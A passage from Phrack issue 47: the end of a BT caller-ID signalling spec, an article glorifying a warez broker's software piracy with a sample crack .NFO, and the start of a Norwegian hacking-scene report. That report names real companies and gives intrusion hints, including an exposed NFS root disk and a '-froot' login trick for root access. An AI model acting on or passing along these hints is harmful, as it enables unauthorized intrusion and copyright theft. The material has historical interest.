  16832.        | 2           | Parameter length (n)                    |
  16833.        | 3           | First digit                             |
  16834.        | 4           | Second digit                            |
  16835.        | .           | .                                       |
  16836.        | .           | .                                       |
  16837.        | n+2         | nth digit                               |
  16838.        ---------------------------------------------------------
  16839.  
  16840.  
  16841.  
  16842. Reason for Absence of Name Parameter
  16843.  
  16844. The reason will be one of the following;
  16845.  
  16846.    P "Name Withheld"; Caller has withheld delivery of name
  16847.    O "Name Unavailable"; The name is not available
  16848.  
  16849.  
  16850.  
  16851.        ---------------------------------------------------------
  16852.        | Byte Number | Contents                                |
  16853.        ---------------------------------------------------------
  16854.        | 1           | Reason for Absence of Name type         |
  16855.        |             | parameter (00001000)                    |
  16856.        | 2           | Parameter length (1)                    |
  16857.        | 3           | Reason                                  |
  16858.        ---------------------------------------------------------
  16859.  
  16860.  
  16861. Network Message System Status Parameter
  16862.  
  16863. The value of the Network Message System Status parameter is a binary
  16864. encoded value indicating the number of messages waiting in the message
  16865. system. 0 means no messages, 1 means one or an unspecified number, other
  16866. values, up to 255, indicate that number of messages waiting.
  16867. This parameter is not necessarily associated with a normal phone call, and
  16868. will probably be sent as a no ring call.
  16869.  
  16870.  
  16871.        ---------------------------------------------------------
  16872.        | Byte Number | Contents                                |
  16873.        ---------------------------------------------------------
  16874.        | 1           | Network System Message Status           |
  16875.        |             | Parameter (00010011)                    |
  16876.        | 2           | Parameter length (1)                    |
  16877.        | 3           | Network System Message Status           |
  16878.        ---------------------------------------------------------
  16879.  
  16880.  
  16881. Unless a Call Type parameter is also set, then any time parameter sent with
  16882. the Network System Status parameter will indicate current clock time. This
  16883. is to enable the terminal equipment to assume the time is current time and
  16884. to set it's internal clock where no Call Type parameter is sent.
  16885.  
  16886.  
  16887. (4) Message Length
  16888.  
  16889.  
  16890. The longest CLIP message, excluding datalink layer information is currently
  16891. 64 bytes. This length is expected for call types "Voice", "Ring-back-when-
  16892. free", "Message Waiting". In future there may be additional parameters that
  16893. could extend message length, these will be sent after the parameters Call
  16894. Type, caller number, name/text, reason for absence of name or number, and
  16895. Network Message System Status.
  16896.  
  16897.  
  16898. (5)Fig 5. Received Characteristics of V.23 Signals
  16899.  ------------------------------------------------------------
  16900.  | Modulation              | FSK                            |
  16901.  ------------------------------------------------------------
  16902.  | Mark (Logic 1)          | 1300 Hz +/- 1.5%               |
  16903.  ------------------------------------------------------------
  16904.  | Space (Logic 0)         | 2100 Hz +/- 1.5%               |
  16905.  ------------------------------------------------------------
  16906.  | Received signal level   | -8dBV to -40dBV                |
  16907.  | for mark                |                                |
  16908.  ------------------------------------------------------------
  16909.  | Received signal level   | -8dBV to -40dBV                |
  16910.  | for space               |                                |
  16911.  ------------------------------------------------------------
  16912.  | Signal level            | The received signal levels may |
  16913.  | differential            | differ by up to 6 dB           |
  16914.  ------------------------------------------------------------
  16915.  | Unwanted signals        | Total power of extraneous      |
  16916.  |                         | signals in the voice band is at|
  16917.  |                         | least 20dB below the signal    |
  16918.  |                         | levels                         |
  16919.  ------------------------------------------------------------
  16920.  | AC & DC load impedance  | AC load impedance is Zss (see  |
  16921.  |                         | below)                         |
  16922.  |                         | DC load impedance has been de- |
  16923.  |                         | scribed above.                 |
  16924.  ------------------------------------------------------------
  16925.  | Transmission rate       | 1200 baud +/- 1%               |
  16926.  ------------------------------------------------------------
  16927.  | Data format             | Serial binary asynchronous (1  |
  16928.  |                         | start bit first, then 8 data   |
  16929.  |                         | bits with least significant    |
  16930.  |                         | bit first, followed by 1 stop  |
  16931.  |                         | bit minimum, up to 10 stop bits|
  16932.  |                         | maximum. Star bit 0, stop bit 0|
  16933.  ------------------------------------------------------------
  16934.  
  16935.  
  16936. (6)Fig 6. Zss
  16937. Zss: a complex impedance nominally represented by the following network;
  16938.  
  16939.        139 nF
  16940.     ----------------
  16941.     |              |
  16942.      ------               -------
  16943.      |     |              |     |      ------------
  16944.      |     ----------------     |      |          |
  16945. O-----                          --------          ----------O
  16946.      |                          |      |          |
  16947.      |     ---------------      |      ------------
  16948.      |     |              |     |         827 Ohms
  16949.      ------               -------
  16950.     |              |
  16951.     ----------------
  16952.        1386 Ohms
  16953.  
  16954.  
  16955. (7)Fig 7. BT IA5 alpha-numeric character set
  16956.  
  16957.    -----------------------------------------------------
  16958.    | B   | b7  | 0  | 0  | 0  | 1  | 1  | 1  | 1  | 1  |
  16959.    -----------------------------------------------------
  16960.    | I   |     |    |    |    |    |    |    |    |    |
  16961.    -----------------------------------------------------
  16962.    | T   | b6  | 0  | 0  | 1  | 1  | 0  | 0  | 1  | 1  |
  16963.    -----------------------------------------------------
  16964.    | S   |     |    |    |    |    |    |    |    |    |
  16965.    -----------------------------------------------------
  16966.    |     | b5  | 0  | 1  | 0  | 1  | 0  | 1  | 0  | 1  |
  16967.       ---------------------------------------------------------
  16968.       |  BITS  |     | 0   | 1  | 2  | 3  | 4  | 5  | 6  | 7  |
  16969.       |b b b b |     |     |    |    |    |    |    |    |    |
  16970.       |4 3 2 1 |     |     |    |    |    |    |    |    |    |
  16971.       ---------------------------------------------------------
  16972.       |0 0 0 0 | 0   |NUL  |TC7 |SP  | 0  | @  | P  | `  | p  |
  16973.       ---------------------------------------------------------
  16974.       |0 0 0 1 | 1   |TC1  |DC1 | !  | 1  | A  | Q  | a  | q  |
  16975.       ---------------------------------------------------------
  16976.       |0 0 1 0 | 2   |TC2  |DC2 | "  | 2  | B  | R  | b  | r  |
  16977.       ---------------------------------------------------------
  16978.       |0 0 1 1 | 3   |TC3  |DC3 | #  | 3  | C  | S  | c  | s  |
  16979.       ---------------------------------------------------------
  16980.       |0 1 0 0 | 4   |TC4  |DC4 | ú  | 4  | D  | T  | d  | t  |
  16981.       ---------------------------------------------------------
  16982.       |0 1 0 1 | 5   |TC5  |TC8 | %  | 5  | E  | U  | e  | u  |
  16983.       ---------------------------------------------------------
  16984.       |0 1 1 0 | 6   |TC6  |TC9 | &  | 6  | F  | V  | f  | v  |
  16985.       ---------------------------------------------------------
  16986.       |0 1 1 1 | 7   |BEL  |TC10| '  | 7  | G  | W  | g  | w  |
  16987.       ---------------------------------------------------------
  16988.       |1 0 0 0 | 8   |FE0  |CAN | (  | 8  | H  | X  | h  | x  |
  16989.       ---------------------------------------------------------
  16990.       |1 0 0 1 | 9   |FE1  |EM  | )  | 9  | I  | Y  | i  | y  |
  16991.       ---------------------------------------------------------
  16992.       |1 0 1 0 | 10  |FE2  |SUB | *  | :  | J  | Z  | j  | z  |
  16993.       ---------------------------------------------------------
  16994.       |1 0 1 1 | 11  |FE3  |ESC | +  | ;  | K  | [  | k  | {  |
  16995.       ---------------------------------------------------------
  16996.       |1 1 0 0 | 12  |FE4  |IS4 | ,  | <  | L  | \  | l  | |  |
  16997.       ---------------------------------------------------------
  16998.       |1 1 0 1 | 13  |FE5  |IS3 | -  | =  | M  | ]  | m  | }  |
  16999.       ---------------------------------------------------------
  17000.       |1 1 1 0 | 14  |SO   |IS2 | .  | >  | N  | ^  | n  | ~  |
  17001.       ---------------------------------------------------------
  17002.       |1 1 1 1 | 15  |SI   |IS1 | /  | ?  | O  | _  | o  |DEL |
  17003.       ---------------------------------------------------------
  17004.  
  17005. Where;
  17006.  
  17007.      BEL = Bell
  17008.      CAN = Cancel
  17009.      DC  = Device Control
  17010.      EM  = End of Medium
  17011.      ESC = Escape
  17012.      FE  = Format Effectors
  17013.      IS  = Information Separator
  17014.      NUL = Null
  17015.      SI  = Shift In
  17016.      SO  = Shift Out
  17017.      SP  = Space
  17018.      SUB = Substitute Character
  17019.      TC  = Transmission Control
  17020.  
  17021.  
  17022.  
  17023.  
  17024.  
  17025.  
  17026. Conclusion:
  17027.  
  17028. My head hurts, I've been in front of this screen for eight hours, I started
  17029. this because I was chucked out of the cinema for being drunk and disorderly
  17030. and I'd nothing else to do, I've got through 2 packs of Marlboros, 1 bottle
  17031. mad dog and a stack of telco manuals. Most of this has been lifted whole-
  17032. sale from those manuals (in the great tradition of all p/h g-philes). I'm
  17033. currently working on a round up of ISDN2 and ISDN30, a glossary for European
  17034. phone phreaks (almost ready), and a technical description of British and
  17035. Irish cellular communication systems. If anybody has any info to share on any
  17036. of these things, or any questions they'd like answered (stick to the subject
  17037. though, I don't know who killed Kennedy, #8^)), then get in touch with me at
  17038. the above address or at any of a variety of boards.
  17039.                               ==Phrack Magazine==
  17040.  
  17041.                  Volume Six, Issue Forty-Seven, File 20 of 22
  17042.  
  17043.  
  17044.                     A Day In The Life Of A Warez Broker
  17045.                                 Xxxx Xxxxxxxx
  17046.                                414 - Area Code
  17047.  
  17048.     I am a warez broker.  Why, you might ask.  Well because I take
  17049. warez from one BBS to another and make credits along the way.  In case
  17050. you're not familiar with the term, "Warez" or "ELiTE", let me fill you in.
  17051.  
  17052.     Warez - are files that are protected by the US Government via
  17053. copyright laws, and are not allowed to be used unless purchased.  This
  17054. would include most programs you can buy at your local Best Buy,
  17055. CompUSA, or EggHead Software.  They are files that you should _not_,
  17056. and I repeat _not_ give to a friend, even if it is for a backup copy in case
  17057. your house burns down, and his doesn't.
  17058.  
  17059.     Alias: Warezzzzzzz, PHiLES, Wares, The Motts (just kidding)
  17060.  
  17061.     ELiTE - is a status.  Above the rest, or in this case, below the rest.
  17062. You are ELiTE if you transfer large amounts of files over some distance,
  17063. whether it's with a disk, or phone line, ISDN line, or Internet.  Who cares
  17064. what the medium, you just must transfer more than one program. No little
  17065. kiddie, since you are 13 and you got a friend to give you a copy of DOS
  17066. 5.0 and Windows 3.0, you are not ELiTE, and Super Nintendo cartridges
  17067. don't count!
  17068.  
  17069.     Alias: 3l33t, PRiVaTe.
  17070.  
  17071.     How do you become ELiTE?  YOU DON'T!  You are asked.  I am
  17072. so sick of people hopping on perfectly legit boards asking for ELiTE.  It is
  17073. such a pain in the ass!  You aren't going to get ELiTE if you ask for it on
  17074. an ELiTE board.
  17075.  
  17076.     But enough of a little background.  For those of you that are still a
  17077. little cloudy as to what exactly ELiTE is, why don't you go read the next
  17078. section of Phrack.  Let's move on......
  17079.  
  17080.     A day in the life of a Warez Broker is very interesting.  And can be
  17081. very exciting.  Most things are time dependent.  Being as credits are the
  17082. exchange for being the first uploader, it is important to get the files first,
  17083. clean them up first, and upload them first.
  17084.  
  17085.     I do not belong to a Group.  There are many out there, but I have
  17086. not joined any as being public is the best way to get caught.  Instead,
  17087. myself and a bunch of some very loyal friends all funnel their Warez
  17088. through me.  Since I am one of the only ones with a real job (8-5), I
  17089. spend many evenings and nights uploading filez that my friends have made
  17090. available for me on my private BBS.
  17091.  
  17092.     It didn't start like that though.  It started as a competition
  17093. between my friends.  At some point they were no longer excited with getting
  17094. the new Warez, and I seemed to have the most time.  Now we all talk back
  17095. and forth often, and we all have our purposes:
  17096.  
  17097.     (names have been changed to protect the defendants)
  17098.  
  17099.     >The Cringer - He takes the files off the internet.  Actually both
  17100. The Cringer and I take them off the Internet, but he seems to always come up
  17101. with the lists of site to go to.  And they normally are REALLY good.
  17102.     >Raxstallion - He tests all the games.  For some reason he is really
  17103. good at games, and can always find the bugs so we can give an honest
  17104. report on the game.  I think he's so good because he doesn't work and
  17105. never goes to class (just look at his check book and report card)
  17106.     >Captian of The Ship - He just whines about how he never gets any
  17107. women, and he also sez "Cool game Raxstallion" a lot.
  17108.     >Dirt Sleasel - He gets us some technical background.
  17109.     >Myself - I take care of all the uploading/downloading of files.  If
  17110. one of my boys need a new program, I get it.  If they get a new file, they
  17111. forward it to me so I can upload it.
  17112.  
  17113.     Now most days are as simple as just checking all the local boards and
  17114. making sure their aren't any new files to move around.  If there are new
  17115. files, I download them, then turn around and upload them somewhere
  17116. else.  Since most of the boards in my A/C are WWIV, they all have 3:1
  17117. upload ratios.  Which means that for every meg of files I upload, I get to
  17118. download 3 meg.  It's kinda nice, because as I move files from one BBS
  17119. to another, I am making credits.  I haven't been doing this long, but for
  17120. the length of time I have, I now have enough credits where I don't have to
  17121. worry about too many files.  Normally now-a-days I will upload big
  17122. programs like Windows NT, or Windows 95 releases.
  17123.  
  17124.     Like I said before, we do a lot of internet stuff.  If The Cringer
  17125. gets a new program, he will upload it to my board, then I take it from there.
  17126. Some nites I am up late on the internet myself, but normally I do mass
  17127. uploads before I hit the sack.  Sometimes, if it's a hot file, I will upload
  17128. the program , and get up late to upload to another board.
  17129.  
  17130.     Since the file transferring is such a big part of my life, I have a
  17131. second phone line.  Maybe this isn't a big deal for someone in a major
  17132. city, but in my A/C it is.  Many people don't have 2 phone lines in their
  17133. house unless they have a fax machine, but in the age of communications,
  17134. it seems as though I sometimes need 3 phone lines.  When someone is
  17135. uploading, and I need to get on the modem it's a pain in the ass.
  17136.  
  17137.     There are quite a few extra files inside of the zip files that are used
  17138. to compress the disks that a program is distributed on.  A pretty popular
  17139. file is the FILE_ID.DIZ file.  This file contains the description of the
  17140. compressed file.  It is nice to include these files since many people don't
  17141. type in a decent description on the description line.
  17142.  
  17143.     ----  Example file_id.diz files (names changed to protect the defendants)
  17144.  
  17145. Media Shop v1.0
  17146. This is a 650$ program.
  17147. You can make the best animation
  17148. for Windows with this.
  17149. Disk 1 of 5
  17150.  
  17151.        ----    X X X x   '95    ----
  17152.        ----  The Xxxxxx Xxxxx  ----
  17153.  
  17154.  
  17155.         ----  End of Example of *.nfo file
  17156.  
  17157.     You can see how in this example.  The name of the file is there and
  17158. it also let's you know the total number of disks which helps you make sure you
  17159. sis get all the downloads needed.  These file_id.diz files can normally be
  17160. viewed on a bbs, for example, these are the default "extended descriptions"
  17161. for WWIV BBS's.
  17162.  
  17163.  
  17164.     The other files normally included are .NFO files.  Normally named
  17165. by group, these files advertise for a crack house, or a distribution house.
  17166.  
  17167.     ----  Example *.nfo files (names changed to protect the defendants)
  17168.  
  17169.  
  17170.                      ⁄ƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒø
  17171.                ƒƒƒÕÕÕµ Xxxxxx Xxxxxxx of Xxxxxxx Presents ΔÕÕÕƒƒƒ
  17172.                      ¿ƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒŸ
  17173.  
  17174.  ⁄ÕÕÕÕÕÕÕÕÕÕ—ÕÕÕÕÕÕÕÕÕÕÕÕø
  17175.  ≥Date:     ≥ Oct 09, 93 ≥
  17176.  √ƒƒƒƒƒƒƒƒƒƒ≈ƒƒƒƒƒƒƒƒƒƒƒƒ¡ÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕø
  17177.  ≥Software: ≥ Sourcer 5.10 *REGISTERED 100%*         ≥
  17178.  √ƒƒƒƒƒƒƒƒƒƒ≈ƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒ¥
  17179.  ≥Publisher:≥ ????                                   ≥
  17180.  √ƒƒƒƒƒƒƒƒƒƒ≈ƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒ¥
  17181.  ≥Member:   ≥ SoNiC (R) -AV                          ≥
  17182.  ¿ÕÕÕÕÕÕÕÕÕÕœÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕÕŸ
  17183.  
  17184.  ⁄ƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒø
  17185.  ≥ Sorry... but now it's really REGISTERED...                                ≥
  17186.  ≥                                                                           ≥
  17187.  ≥ 1st. Entpack the original SOURCER-Files                                   ≥
  17188.  ≥ 2rd. Run SR510UTG.COM                                                     ≥
  17189.  ≥ 3nd. Run SR.EXE and enter the following serno: XXXXXXX-XXXX               ≥
  17190.  ≥                                                                           ≥
  17191.  ¿ƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒŸ
  17192.  
  17193.  ⁄ƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒø
  17194.  ≥ -=* Xxxxxx Xxxxxxx of Xxxxxxx *=-                                         ≥
  17195.  √ƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒ¥
  17196.  ≥ Members:   xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx   ≥
  17197.  ≥            xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx     ≥
  17198.  ≥            xxxxxxxxxxxxxxxxx                                              ≥
  17199.  √ƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒ¥
  17200.  ≥ Courier:   xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx   ≥
  17201.  ≥            xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx                 ≥
  17202.  √ƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒ¥
  17203.  ≥ xxxxxxxxxxxxx         ...-...-....   Xxx Xxxxxx      6 Nodes   World   HQ ≥
  17204.  ≥ xxxxxxxxxxxxx         ...-...-....   Xxx Xxxxxxxx    9 Nodes   Europe  HQ ≥
  17205.  ≥ xxxxxxxxxxx           ...-...-....   Xxx Xxxxxxx     2 Nodes   West    HQ ≥
  17206.  ≥ xxxxxxxxxxxxxx        ...-...-....   Xxxx Xxxxx      3 Nodes   East    HQ ≥
  17207.  ≥ xxxxxxxxxxxxxxxxxxxxx ...-...-....   Xxxxx           3 Nodes   Dist Site  ≥
  17208.  ≥ xxxxxxxxxxxx          ...-...-....   Xxxxxxxx        4 Nodes   Dist Site  ≥
  17209.  ≥ xxxxxxxxxxxxxx        818-xxx-xxxx   Xxxxxxxxx       1 Node    Dist Site  ≥
  17210.  √ƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒ¥
  17211.  ≥       If you want to contact us call one of these fine BBS and leave      ≥
  17212.  ≥                     a mail to The Xxxxxxxx or Xxxxxxxxxx                  ≥
  17213.  ¿ƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒƒŸ
  17214.  
  17215.     ----  End of Example of *.nfo file
  17216.  
  17217.     You can see in this example how they not only name their members, but
  17218. also the couriers.  These couriers make sure that the crack house's files
  17219. get distributed.  The members help crack and get the files ready for the
  17220. couriers.
  17221.  
  17222.     For example, let's say there is a group called Slimers, they might
  17223. include a .NFO called SLIMERS.NFO.  Sometimes these files give you
  17224. a little insight on the group, but most times they say "Hi" to the people
  17225. in their groups, and sometimes even a little about the group.  Normally
  17226. they include x'ed out phone numbers to the group's BBS.
  17227.  
  17228.     How do these files get out there?  Well I have many theories.  One is
  17229. that someone buys the stuff and then uploads them to the group.  We
  17230. sometimes buy the programs, if they aren't out there, and then copy them
  17231. and re-shrinkwrap the file before returning the whole program.
  17232. Sometimes, even the makers of the games leak the program before it is
  17233. released.  This is what seems to have happened with Doom II.
  17234.  
  17235.     Most boards these days are running at 28.8Kbps.  There are still a
  17236. few running 14.4Kbps lines to give those that have a slower modem a
  17237. place to call in without having to tie up the faster lines.  I'm sure with
  17238. the onslaught of CDROM's becoming more popular in the program world, the
  17239. amount of warez piracy will diminish for a while.  But some day I'm sure
  17240. that there will be a new way to get a hold of the new programs.
  17241.  
  17242.     As soon as the price of CDROM-R (worm) drives come down, there
  17243. will be more transfer of total CD programs.  I guess that the 600 meg
  17244. files will take a little longer to transfer.  I think someone should redesign
  17245. their board so that a person may download a large file, or at least part of a
  17246. large file, so they can use their time online to download parts of the
  17247. CDROM.  We'll see, that talk is just starting to begin.
  17248.  
  17249.     The ELiTE Community is very secretive, and very secure.  No one is
  17250. let in, and once you're in, you're not expected to leave.  There is a
  17251. lot of trust built in The Community.  The only way to get into The ELiTE
  17252. Community is to know someone who is willing to vouch for you.
  17253. Without someone to speak of your credibility, you will get no where.
  17254. Once you are in and have established yourself, you can pretty much speak
  17255. for yourself, or get a sysop to refer you.
  17256.  
  17257.     The nice thing about being in the ELiTE Community is you never
  17258. really get to meet anyone in person.  Heck, you might never even talk to a
  17259. person in voice.  Things are so secretive, a lot of times you don't even
  17260. know where you are calling.  If you do meet someone, though, normally people
  17261. are so generous to their own.  It's like a close family.  It's nice to
  17262. have that kind of closeness.  You have students, programmers, computer
  17263. hobbyists, newbies, kiddies, those with bedtimes, those that never go to
  17264. bed, and still those that sit back and just take it all in.
  17265.  
  17266.     I have many friend that have an idea of what I do, but I will rarely
  17267. refer a friend, even if I know they're cool.  It's not a good idea for
  17268. everyone to know.  Whether I can trust a friend or not, I don't think it's a
  17269. good idea to get them involved.  Things are dangerous, and you are
  17270. better off looking for what they want, and uploading what they give you.
  17271.  
  17272.     Hopefully in my next article I can give you some specifics regarding
  17273. getting filez from the internet, or how to get in touch with the ELiTE
  17274. Community in your A/C.  Until then, remember, there are more ELiTE
  17275. boards than there are not.  For those boards that are not ELiTE, thanks for
  17276. the distraction from the ELiTE boards, and sorry for all the heat!
  17277.  
  17278. Secretly yours,
  17279.         Xxxx Xxxxxxxx
  17280.                               ==Phrack Magazine==
  17281.  
  17282.                  Volume Six, Issue Forty-Seven, File 21 of 22
  17283.  
  17284. ****************************************************************************
  17285.  
  17286.                              International Scenes
  17287.  
  17288. There was once a time when hackers were basically isolated.  It was
  17289. almost unheard of to run into hackers from countries other than the
  17290. United States.  Then in the mid 1980's thanks largely to the
  17291. existence of chat systems accessible through X.25 networks like
  17292. Altger, tchh and QSD, hackers world-wide began to run into each other.
  17293. They began to talk, trade information, and learn from each other.
  17294. Separate and diverse subcultures began to merge into one collective
  17295. scene and has brought us the hacking subculture we know today.  A
  17296. subculture that knows no borders, one whose denizens share the common goal
  17297. of liberating information from its corporate shackles.
  17298.  
  17299. With the incredible proliferation of the Internet around the globe, this
  17300. group is growing by leaps and bounds.  With this in mind, we want to help
  17301. further unite the communities in various countries by shedding light
  17302. onto the hacking scenes that exist there.  If you want to contribute a
  17303. file about the hacking scene in your country, please send it to us
  17304. at phrack@well.com.
  17305.  
  17306. This month we have files about the scenes in Norway, France, Italy and an
  17307. update from Denmark.
  17308.  
  17309. ------------------------------------------------------------------------------
  17310.  
  17311. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  17312. dfp-1   An orientation on the Norwegian hacking/phreaking scene    dfp-1
  17313.  
  17314.        Written by the Digital Freedom Phanatic (dfp@powertech.no)
  17315.                     Brought to you in January, 1995
  17316. - - - - - - - - - - - - - - - - -  - - - - - - - - - - - - - - - - - - -
  17317.  
  17318. PROLOGUE: It's 1995 and little has been mentioned about Norwegian
  17319. hackers in the media lately.  I thought this would be a nice opportunity
  17320. to summarize some of the things that have happened on the scene in
  17321. Norway during the last 5 or so years.  For those of you in the Norwegian
  17322. audience not recognizing my name; you shouldn't.  I am more or less an
  17323. acquaintance of many of you guys, but I feel that in order to get
  17324. something done on the Norwegian scene right now (it's been fairly quiet
  17325. for a while, nicht wahr?) I cannot reveal my true identity.  Hell, let's
  17326. see if I get any responses to this article.  Now for the good stuff...
  17327.  
  17328. Unfortunately I entered the scene as late as around 1990, so I'm not
  17329. quite up-to-date on stuff that happened before that.  I've been trying
  17330. to gather old articles from newspapers and books.  What I have been
  17331. able to come up with is more or less some articles about a couple of
  17332. hackers who managed to get into a local newspaper's computer.  Also,
  17333. I have gotten in touch with some of the _real old Norwegian hackers_
  17334. dating back to the '70s.  Needless to say, those people today work in
  17335. the telecommunications industry.
  17336.  
  17337. AREAS OF INTEREST FOR HACKERS: First, a little introduction to Norway.
  17338. We are a very, very rich country, mainly due to the enormous amount of
  17339. oil resources which we are pumping from the North Sea.  As a result of
  17340. this wealth (I guess), our people are well educated and we have a blooming
  17341. industry.  Well, in some cases.  Nevermind.  Keywords: large corporations,
  17342. very large and respected telecommunications semi-monopoly, expensive
  17343. communications.
  17344.  
  17345. So in theory, there should be a lot of corporate hacking taking place in
  17346. Norway.  Well, either the people doing this are doing it real well, or
  17347. nobody is doing it.  I don't think anybody is.  As I have come to
  17348. understand, most hacking in Norway has really been Internet related.
  17349. Norway was actually one of the first countries apart from USA getting
  17350. connected to the Internet; way back in 1982.
  17351.  
  17352. STATUS OF INTERNET CONNECTIVITY: The universities have been hooked up
  17353. since the dawn of time, and today these are the centers of the Internet
  17354. community and high-speed telecom equipment in general use in Norway.
  17355. Actually, we have four universities and at least three of them are
  17356. currently networked with each other at a speed of 34Mbps.  The
  17357. university network's (Uninett) international Internet connection is
  17358. through NORDUnet and has a bandwidth of 2Mbps. Until a couple of
  17359. years ago, one could not gain legitimate access to the Internet except
  17360. by obtaining an account on one of the Uninett connected machines.  This
  17361. was impossible, at least for a majority of the hacker community, so
  17362. Uninett, or rather the computers at the University of Oslo, became a Mecca
  17363. for the scene.  The big people had accounts there, or borrowed one.
  17364. However, security is pretty stiff there and I fear that there was little
  17365. actual _hacking_ going on, people were merely borrowing legitimate
  17366. accounts through friends.
  17367.  
  17368. What's fun about the University of Oslo computer network is that it
  17369. until recently could be used for dialling out with speeds up to
  17370. 14.4kbps. Actually, some of their dialup terminal servers were
  17371. configured to let you connect into them and dial out.  Try CONNECT
  17372. USEk.15 after logging in to Net/ONE (the University LAN).  I don't think
  17373. this works anymore, nor do I know if this was a "feature" introduced
  17374. when the terminal servers were installed.  It could be that some hacker
  17375. reconfigured them.  In that case, please let me know!  Dialled 820s
  17376. as well (The 900 numbers of Norway).
  17377.  
  17378. Today the Internet situation is very different.  We have had an
  17379. extravagant boost in the number of Internet access providers lately:
  17380. Oslonett, PowerTech, EUnet, Vestnett, BigBlue, MoNet, NordNet and PMDData
  17381. are those I can think of right now.  Also, a number of companies are
  17382. providing leased-line access: TelePost, EUnet and Datametrix.  PowerTech
  17383. is starting to do this soon now (they say), presumably with competitive
  17384. prices, but they are real bad on bandwidth.  (Well, they've been the
  17385. cheapest for me so far.)  At least we're not far from getting Internet
  17386. trial accounts shovelled up our asses here.  Let's hope some souls will
  17387. soon pour some actual value into the net; more information, more
  17388. services. I've seen little of that.
  17389.  
  17390. Until we get more Norwegian fun services on the Net, we might as well
  17391. exploit the services of Norwegian companies with no clue whatsoever when
  17392. it comes to security.  Take, for instance, Cinet AS (cinet.no) which has
  17393. a world NFS mountable root disk (rw). BigBlue Systems AS (bigblue.no) uses
  17394. a Linux server which you can log to using accounts named node1, node2 or
  17395. node3.  Full shell user access.  Or you could try logging in as "-froot"
  17396. to obtain root access.  Hm, I think they plugged that. :)  Well, ach so.
  17397. There's more out there.  Just get hacking.  And feel free to tell me what
  17398. you find!
  17399.  
  17400. WHAT WERE THE HACKERS DOING: There used to be a blooming hacking scene
  17401. in Norway earlier.  Well, one might not say blooming with bright ideas
  17402. and happenings, but at least there were many people doing the right
  17403. stuff.  Using X.25 NUIs to get to QSD, Password spoofing at the local
  17404. DataPak PAD using Pad2Pad, Social Engineering, Hacking calling cards to
  17405. get to the states, finding AT&T Alliance backdoors so as to keep people
  17406. up all night long when there was school the day after..  The good old
  17407. days.  We could even do easy blueboxing.  1980s-1992.
  17408.  
  17409. I must admit, though, that QSD isn't much anymore.  I liked it better
  17410. when there were a hundred people logged in simultaneously, and when
  17411. there were alliances being held with people from the States, Norway,
  17412. Denmark, Israel, all over the place.  Then came the busts.  It was
  17413. around October 1992 when the first busts started taking place.  We have
  17414. a very interesting timeline there.  First, the police teamed up with a
  17415. couple of computer software retailers (BJ Electronics, sounds familiar
  17416. huh?) and busted ten or so of the warez type board sysops.  People to
  17417. remember: Gizmo, Enemy :-).
  17418.  
  17419. Soon after that, bigger names were taken down.  Mario, Graham Two
  17420. (Vishnu), Edison, RamJet, Peter, Leikarnes etc.  Kevin was never busted.
